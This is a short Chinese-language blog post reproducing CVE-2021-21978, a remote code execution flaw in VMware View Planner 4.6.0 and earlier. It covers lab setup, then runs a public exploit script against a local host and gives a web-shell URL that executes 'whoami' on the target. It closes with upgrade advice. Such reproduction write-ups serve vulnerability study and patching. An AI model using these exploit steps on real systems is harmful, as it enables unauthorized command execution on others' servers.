VM View Planner RCE 漏洞(CVE-2021-21978)复现

2024-01-18 13:19:46

简介

 

View Planner是VMware官方推出的一款针对view桌面的测试工具,通过这个测试工具可以估算出在指定的应用环境下可以发布多少个view桌面。

 

影响版本

VMware View Planner <= 4.6.0

 

 

环境搭建

 

https://my.vmware.com/en/group/vmware/downloads/details?downloadGroup=VIEW-PLAN-460&productId=1067&rPId=53394

VM View Planner RCE 漏洞(CVE-2021-21978)复现

直接导入

VM View Planner RCE 漏洞(CVE-2021-21978)复现

VM View Planner RCE 漏洞(CVE-2021-21978)复现

VM View Planner RCE 漏洞(CVE-2021-21978)复现

 

漏洞复现

 

Exp地址

https://github.com/skytina/CVE-2021-21978
py -3 CVE-2021-21978.py https://192.168.1.100/

VM View Planner RCE 漏洞(CVE-2021-21978)复现

访问https://192.168.1.100//logupload?secert=NiuNiu2020&command=whoami

VM View Planner RCE 漏洞(CVE-2021-21978)复现

 

修复建议

 

升级到安全版本

 

上一篇:深度系统更新(2020.11.11)


下一篇:Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199复现